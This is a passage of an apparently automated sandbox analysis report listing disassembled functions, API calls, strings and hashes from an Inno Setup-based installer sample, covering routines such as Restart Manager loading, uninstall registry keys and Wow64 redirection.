                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483099
                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004830AC
                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 004830B2
                                                                  • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004830C9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                  • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                  • API String ID: 2230631259-2623177817
                                                                  • Opcode ID: 19051ef92357407474476a60c046aa04f8c513acd1fb492cc3cf86325791a6e5
                                                                  • Instruction ID: af3d4bc633e3fac8e2117acd109dd394a62660f1f52edacbaea6f09291502d38
                                                                  • Opcode Fuzzy Hash: 19051ef92357407474476a60c046aa04f8c513acd1fb492cc3cf86325791a6e5
                                                                  • Instruction Fuzzy Hash: 9211B69010574194DA117B764C5E76F19888B12F1BF140C3BB880662DBEABD8F45CB2F
                                                                  Function 00450294 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 45libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1610 450294-4502a1 1611 4502a7-4502b4 GetVersion 1610->1611 1612 450350-45035a 1610->1612 1611->1612 1613 4502ba-4502d0 LoadLibraryA 1611->1613 1613->1612 1614 4502d2-45034b GetProcAddress * 6 1613->1614 1614->1612
                                                                  APIs
                                                                  • GetVersion.KERNEL32(00480154), ref: 004502A7
                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480154), ref: 004502BF
                                                                  • GetProcAddress.KERNEL32(6C9F0000,RmStartSession), ref: 004502DD
                                                                  • GetProcAddress.KERNEL32(6C9F0000,RmRegisterResources), ref: 004502F2
                                                                  • GetProcAddress.KERNEL32(6C9F0000,RmGetList), ref: 00450307
                                                                  • GetProcAddress.KERNEL32(6C9F0000,RmShutdown), ref: 0045031C
                                                                  • GetProcAddress.KERNEL32(6C9F0000,RmRestart), ref: 00450331
                                                                  • GetProcAddress.KERNEL32(6C9F0000,RmEndSession), ref: 00450346
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoadVersion
                                                                  • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                  • API String ID: 1968650500-3419246398
                                                                  • Opcode ID: f300c04dd650cc6e2fa8790a8e0a5b734cbc62ec7341ff736350933aa5c91be4
                                                                  • Instruction ID: 86b2f7b41730535ff8ff974bf0b660ab9cb9644c053cd973342487371e557a0c
                                                                  • Opcode Fuzzy Hash: f300c04dd650cc6e2fa8790a8e0a5b734cbc62ec7341ff736350933aa5c91be4
                                                                  • Instruction Fuzzy Hash: EF11B3B5510301EBD610FB65BF46A2E37EAE728715B08063FE904962A2CB7C8844CF9C
                                                                  Function 00468BB0 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155registryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1615 468bb0-468be8 call 47bb50 1618 468bee-468bfe call 4788b8 1615->1618 1619 468dca-468de4 call 403420 1615->1619 1624 468c03-468c48 call 4078e4 call 403738 call 42de14 1618->1624 1630 468c4d-468c4f 1624->1630 1631 468c55-468c6a 1630->1631 1632 468dc0-468dc4 1630->1632 1633 468c7f-468c86 1631->1633 1634 468c6c-468c7a call 42dd44 1631->1634 1632->1619 1632->1624 1636 468cb3-468cba 1633->1636 1637 468c88-468caa call 42dd44 call 42dd5c 1633->1637 1634->1633 1639 468d13-468d1a 1636->1639 1640 468cbc-468ce1 call 42dd44 * 2 1636->1640 1637->1636 1656 468cac 1637->1656 1642 468d60-468d67 1639->1642 1643 468d1c-468d2e call 42dd44 1639->1643 1660 468ce3-468cec call 4314f0 1640->1660 1661 468cf1-468d03 call 42dd44 1640->1661 1645 468da2-468db8 RegCloseKey 1642->1645 1646 468d69-468d9d call 42dd44 * 3 1642->1646 1657 468d30-468d39 call 4314f0 1643->1657 1658 468d3e-468d50 call 42dd44 1643->1658 1646->1645 1656->1636 1657->1658 1658->1642 1668 468d52-468d5b call 4314f0 1658->1668 1660->1661 1661->1639 1672 468d05-468d0e call 4314f0 1661->1672 1668->1642 1672->1639
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegCloseKey.ADVAPI32(?,00468DCA,?,?,00000001,00000000,00000000,00468DE5,?,00000000,00000000,?), ref: 00468DB3
                                                                  Strings
                                                                  • Inno Setup: No Icons, xrefs: 00468C9B
                                                                  • Inno Setup: Setup Type, xrefs: 00468CC2
                                                                  • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468C0F
                                                                  • Inno Setup: Icon Group, xrefs: 00468C8E
                                                                  • Inno Setup: Deselected Components, xrefs: 00468CF4
                                                                  • Inno Setup: User Info: Name, xrefs: 00468D6F
                                                                  • Inno Setup: User Info: Organization, xrefs: 00468D82
                                                                  • Inno Setup: Selected Tasks, xrefs: 00468D1F
                                                                  • Inno Setup: Selected Components, xrefs: 00468CD2
                                                                  • %s\%s_is1, xrefs: 00468C2D
                                                                  • Inno Setup: User Info: Serial, xrefs: 00468D95
                                                                  • Inno Setup: Deselected Tasks, xrefs: 00468D41
                                                                  • Inno Setup: App Path, xrefs: 00468C72
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen
                                                                  • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                  • API String ID: 47109696-1093091907
                                                                  • Opcode ID: 8db79232fb2f2725b9adfe70d64749861c257aff0263038353b857e31bb30bb7
                                                                  • Instruction ID: 9409bd20b999dcc9be58dd01f280802f9f4acbf4d31626fc1b9235e67c3febe1
                                                                  • Opcode Fuzzy Hash: 8db79232fb2f2725b9adfe70d64749861c257aff0263038353b857e31bb30bb7
                                                                  • Instruction Fuzzy Hash: B451C430A006489BCB11DB65C9917DEB7F5EF98304F50816FE840A7391EB78AE41CB19
                                                                  Function 0042386C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98windowregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1833 42386c-423876 1834 42399f-4239a3 1833->1834 1835 42387c-42389e call 41f3bc GetClassInfoA 1833->1835 1838 4238a0-4238b7 RegisterClassA 1835->1838 1839 4238cf-4238d8 GetSystemMetrics 1835->1839 1838->1839 1842 4238b9-4238ca call 408cac call 40311c 1838->1842 1840 4238da 1839->1840 1841 4238dd-4238e7 GetSystemMetrics 1839->1841 1840->1841 1843 4238e9 1841->1843 1844 4238ec-423948 call 403738 call 4062e8 call 403400 call 423644 SetWindowLongA 1841->1844 1842->1839 1843->1844 1856 423962-423990 GetSystemMenu DeleteMenu * 2 1844->1856 1857 42394a-42395d call 424170 SendMessageA 1844->1857 1856->1834 1858 423992-42399a DeleteMenu 1856->1858 1857->1856 1858->1834
                                                                  APIs
                                                                    • Part of subcall function 0041F3BC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED9C,?,00423887,00423C04,0041ED9C), ref: 0041F3DA
                                                                  • GetClassInfoA.USER32(00400000,00423674), ref: 00423897
                                                                  • RegisterClassA.USER32(00499630), ref: 004238AF
                                                                  • GetSystemMetrics.USER32(00000000), ref: 004238D1
                                                                  • GetSystemMetrics.USER32(00000001), ref: 004238E0
                                                                  • SetWindowLongA.USER32(00410648,000000FC,00423684), ref: 0042393C
                                                                  • SendMessageA.USER32(00410648,00000080,00000001,00000000), ref: 0042395D
                                                                  • GetSystemMenu.USER32(00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04,0041ED9C), ref: 00423968
                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04,0041ED9C), ref: 00423977
                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00423984
                                                                  • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410648,00000000,00000000,00400000,00000000,00000000,00000000), ref: 0042399A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                  • String ID: t6B
                                                                  • API String ID: 183575631-3178735703
                                                                  • Opcode ID: 5827b0b13dbe7130606d895180cc1450c2f1a68b369bd82c96e4222b10ed1bb4
                                                                  • Instruction ID: b8adc5bb76ba60810a7e15457cf144511173abf09441cb7f9a8677178c11600e
                                                                  • Opcode Fuzzy Hash: 5827b0b13dbe7130606d895180cc1450c2f1a68b369bd82c96e4222b10ed1bb4
                                                                  • Instruction Fuzzy Hash: 003150B17402006AE710BF699C82F6A37989B14709F60017AFA44EF2D7C6BDED44876D
                                                                  Function 0047C65C Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 95libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1972 47c65c-47c6b2 call 42c3f4 call 4035c0 call 47c320 call 4525ac 1981 47c6b4-47c6b9 call 453318 1972->1981 1982 47c6be-47c6cd call 4525ac 1972->1982 1981->1982 1986 47c6e7-47c6ed 1982->1986 1987 47c6cf-47c6d5 1982->1987 1990 47c704-47c72c call 42e38c * 2 1986->1990 1991 47c6ef-47c6f5 1986->1991 1988 47c6f7-47c6ff call 403494 1987->1988 1989 47c6d7-47c6dd 1987->1989 1988->1990 1989->1986 1992 47c6df-47c6e5 1989->1992 1998 47c753-47c76d GetProcAddress 1990->1998 1999 47c72e-47c74e call 4078e4 call 453318 1990->1999 1991->1988 1991->1990 1992->1986 1992->1988 2001 47c76f-47c774 call 453318 1998->2001 2002 47c779-47c796 call 403400 * 2 1998->2002 1999->1998 2001->2002
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(6FBF0000,SHGetFolderPathA), ref: 0047C75E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$imI$shell32.dll$shfolder.dll
                                                                  • API String ID: 190572456-2091577475
                                                                  • Opcode ID: d288e8e16deffb628a1a36f0e60e66c1c4d1894b7e7b0e008bed83d76a7a8b95
                                                                  • Instruction ID: 1bc5907ccbf8c7c126ff73efdb0a93079a3df87e782a300c574b3872d81dfa42
                                                                  • Opcode Fuzzy Hash: d288e8e16deffb628a1a36f0e60e66c1c4d1894b7e7b0e008bed83d76a7a8b95
                                                                  • Instruction Fuzzy Hash: BF311D30A00149DBCB00EFA9D9D29DEB7B5EB44305F61847BE404E7241DB389E45CBAD
                                                                  Function 0040631C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2010 40631c-406336 GetModuleHandleA GetProcAddress 2011 406338 2010->2011 2012 40633f-40634c GetProcAddress 2010->2012 2011->2012 2013 406355-406362 GetProcAddress 2012->2013 2014 40634e 2012->2014 2015 406364-406366 SetProcessDEPPolicy 2013->2015 2016 406368-406369 2013->2016 2014->2013 2015->2016
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,004980CC), ref: 00406322
                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                  • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                  • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                  • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,004980CC), ref: 00406366
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModulePolicyProcess
                                                                  • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                  • API String ID: 3256987805-3653653586
                                                                  • Opcode ID: 46e9f49e023cd011afba093bed0ab82df2a9fb2f70a8bbd92ca42cf1d07dc1dc
                                                                  • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                  • Opcode Fuzzy Hash: 46e9f49e023cd011afba093bed0ab82df2a9fb2f70a8bbd92ca42cf1d07dc1dc
                                                                  • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                  Function 00413213 Relevance: 14.6, APIs: 6, Strings: 2, Instructions: 635COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 0041365C
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00413667
                                                                  • GetWindowLongA.USER32(?,000000F4), ref: 00413679
                                                                  • SetWindowLongA.USER32(?,000000F4,?), ref: 0041368C
                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136A3
                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136BA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$Prop
                                                                  • String ID: wA$yA
                                                                  • API String ID: 3887896539-1847240991
                                                                  • Opcode ID: f90247c629a947c585d53ebd803f71ac5ff518e129def1d5e0d2b734115b4926
                                                                  • Instruction ID: c74ba7ed2530cb1b13d42f77b59a1a0282e776654e1e26cace8cc99fbade548e
                                                                  • Opcode Fuzzy Hash: f90247c629a947c585d53ebd803f71ac5ff518e129def1d5e0d2b734115b4926
                                                                  • Instruction Fuzzy Hash: E922D06108E3C05FE3279B74896A5D17FA0EE23326B1D45DFC4C28B1A3D61D8A87C71A
                                                                  Function 0042F558 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90windowregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2154 42f558-42f562 2155 42f564-42f567 call 402d30 2154->2155 2156 42f56c-42f5a9 call 402b30 GetActiveWindow GetFocus call 41ee9c 2154->2156 2155->2156 2162 42f5bb-42f5c3 2156->2162 2163 42f5ab-42f5b5 RegisterClassA 2156->2163 2164 42f64a-42f666 SetFocus call 403400 2162->2164 2165 42f5c9-42f5fa CreateWindowExA 2162->2165 2163->2162 2165->2164 2166 42f5fc-42f640 call 424274 call 403738 CreateWindowExA 2165->2166 2166->2164 2173 42f642-42f645 ShowWindow 2166->2173 2173->2164
                                                                  APIs
                                                                  • GetActiveWindow.USER32 ref: 0042F587
                                                                  • GetFocus.USER32 ref: 0042F58F
                                                                  • RegisterClassA.USER32(004997AC), ref: 0042F5B0
                                                                  • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F684,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5EE
                                                                  • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F634
                                                                  • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F645
                                                                  • SetFocus.USER32(00000000,00000000,0042F667,?,?,?,00000001,00000000,?,00458172,00000000,0049B628), ref: 0042F64C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                  • String ID: TWindowDisabler-Window
                                                                  • API String ID: 3167913817-1824977358
                                                                  • Opcode ID: cf20678f2c7b31b6636adb6e359071d3d006b90a76df8335edf94e9f5e6a866f
                                                                  • Instruction ID: 4511064fd05a7bbda13c40d4eeb951e72c3c37d4b9ac5deb9698ad8496ae2c71
                                                                  • Opcode Fuzzy Hash: cf20678f2c7b31b6636adb6e359071d3d006b90a76df8335edf94e9f5e6a866f
                                                                  • Instruction Fuzzy Hash: B621A171740710BAE220EF61AD43F1A76B8EB14B04F91453BF504AB2E1D7B9AD0586AD
                                                                  Function 004531C4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2174 4531c4-453215 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 2175 453217-45321e 2174->2175 2176 453220-453222 2174->2176 2175->2176 2177 453224 2175->2177 2178 453226-45325c call 42e38c call 42e8c0 call 403400 2176->2178 2177->2178
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531E4
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004531EA
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531FE
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453204
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                  • API String ID: 1646373207-2130885113
                                                                  • Opcode ID: cff16269528c733e120fa4e5da7181aa43c1feff678136145baf2a5753302424
                                                                  • Instruction ID: 97fdcfa8d8ba184edd095c4085c6b9ff9a8965db98d5396ade8c15ee503d7826
                                                                  • Opcode Fuzzy Hash: cff16269528c733e120fa4e5da7181aa43c1feff678136145baf2a5753302424
                                                                  • Instruction Fuzzy Hash: 5D018870244B05AED701BF73AD02F5A7A58DB0579BF5004BBF81496183D77C4A08CAAD
                                                                  Function 00466FA8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 141windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046704B
                                                                  • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467071
                                                                    • Part of subcall function 00466EE8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466F80
                                                                    • Part of subcall function 00466EE8: DestroyCursor.USER32(00000000), ref: 00466F96
                                                                  • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004670C8
                                                                  • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467129
                                                                  • ExtractIconA.SHELL32(00400000,00000000,?), ref: 0046714F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                  • String ID: c:\directory$shell32.dll
                                                                  • API String ID: 3376378930-1375355148
                                                                  • Opcode ID: 996b1765118ede8ef69c1a99999a79d5e00ae09db6322347ba6ec5c8e15e0822
                                                                  • Instruction ID: 289419416c676a83544b633f3186a9d007cfc28e75d1c6b72818de0571a1fc75
                                                                  • Opcode Fuzzy Hash: 996b1765118ede8ef69c1a99999a79d5e00ae09db6322347ba6ec5c8e15e0822
                                                                  • Instruction Fuzzy Hash: ED515E74604244AFDB11DF65DD85FCFB7A8EB49308F5081B7F40897352D638AE81CA59
                                                                  Function 00430938 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23registryclipboardthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430940
                                                                  • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0043094F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00430969
                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 0043098A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
